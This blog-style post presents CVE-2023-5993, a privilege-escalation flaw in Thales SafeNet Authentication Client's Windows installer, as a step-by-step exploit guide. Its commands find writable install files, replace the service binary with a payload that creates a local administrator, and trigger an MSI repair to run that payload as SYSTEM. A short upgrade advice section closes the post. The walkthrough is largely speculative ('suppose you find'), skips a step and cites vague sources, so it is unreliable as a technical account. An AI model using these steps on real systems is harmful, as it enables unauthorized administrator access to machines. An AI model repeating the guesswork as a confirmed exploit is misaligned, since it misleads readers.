CVE CyberSecurity Database News

CVE-2023-5993 - Windows Installer Vulnerability in Thales SafeNet Authentication Client – Local Privilege Escalation Exploit Guide

Poster -

In the fast-evolving world of cybersecurity, privilege escalation vulnerabilities are top seeds for attackers looking to gain more control over a target system. One such vulnerability, CVE-2023-5993, affects Thales SafeNet Authentication Client (SAC) for Windows prior to version 10.8 R10. This flaw lurks in the way the Windows Installer interacts with SAC, and—if properly abused—lets a local attacker gain elevated privileges, potentially compromising sensitive environments.

This post breaks down the details of the bug, gives you a technical demo for exploit, and provides helpful links for responsible response.

Vulnerability Details

- CVE: CVE-2023-5993

How the Vulnerability Works

The problem stems from how the Windows Installer (MSI) package for Thales SAC sets file and directory permissions during install or update. Specifically, it grants overly permissive rights to sensitive folders or files, making them modifiable by non-admin users. These "world-writable" resources can be swapped out or replaced by malicious files/scripts, which the system then executes with elevated privileges during an update or repair process.

Walkthrough: Exploiting the Flaw

Below is a simple breakdown and reproducible example demonstrating exploitation on a vulnerable system.

Step 1: Identify Vulnerable Permissions

After installing a vulnerable SAC client, check file/folder permissions for defects. Use built-in PowerShell to spot world-writable resources:

# List SAC install folder permissions
$installPath = "C:\Program Files\SafeNet\Authentication\SAC"
Get-ChildItem $installPath -Recurse | Get-Acl | Where-Object { $_.AccessToString -match "Everyone Allow  FullControl" }

If you find files/folders where "Everyone" has "FullControl," these are red flags.

Suppose you find that the SAC service binary is world-writable

C:\Program Files\SafeNet\Authentication\SAC\sacservice.exe

You could replace it (as an unprivileged user) with your own payload—say, a reverse shell or an admin user-creation script.

*Example: Replace with a simple payload that adds a new local admin.*

# Craft a batch payload
echo net user hackedUser MySecurePass123! /add > C:\temp\payload.bat
echo net localgroup administrators hackedUser /add >> C:\temp\payload.bat

# Replace the sacservice.exe with a bat-to-exe converted payload (for demo)
Copy-Item "C:\temp\payload.exe" "C:\Program Files\SafeNet\Authentication\SAC\sacservice.exe" -Force

Step 3: Trigger Elevation

Trigger a repair/uninstall/reinstall/update of SAC (as a regular user or by tricking an admin). This can sometimes be done via the Windows Installer's "Self-Heal" feature:

# Call repair (simulate admin or scheduled update)
msiexec /fa {YOUR-SAC-PRODUCT-CODE}

When Windows Installer starts the SAC service or executable, it runs with SYSTEM or elevated rights, executing the attacker's payload instead of the legitimate binary.

Step 4: Enjoy Admin Shell

After triggering, check for the newly created user or reverse shell access (depending on your payload).

# Confirm user
net user hackedUser
net localgroup administrators

Simple Exploit: Tools like PowerShell make the attack easy, no special skill required.

- Persistence: Attackers can achieve SYSTEM-level persistence on a corporate laptop or workstation.


## Recommended Fix / Mitigation

Upgrade to at least v10.8 R10!
Thales has fixed permissions in the affected files/directories.

Audit SAC directories for improper permissions.

- Manually reset folder/file ACLs to restrict write access to admins only.

Reference

- Thales Security Advisory (login required)
- SafeNet FAQ (login required)

Conclusion

CVE-2023-5993 is a textbook example of "install-time" privilege escalation. Although this kind of bug is becoming rarer, third-party Windows installers still pose risks if permissions are misconfigured. If you use Thales SafeNet Authentication Client—for instance, in enterprise smart card deployments—update now. Don't let a local user or malware on your endpoints become the gateway for total compromise.

More Reading

- NIST National Vulnerability Database: CVE-2023-5993
- Windows Installer Security Best Practices
- SafeNet Authentication Client Updates (login required)


_This post is provided for educational and defensive purposes only. Do not use in environments you do not own or operate._

Timeline

Published on: 02/27/2024 11:15:07 UTC
Last modified on: 02/27/2024 14:19:41 UTC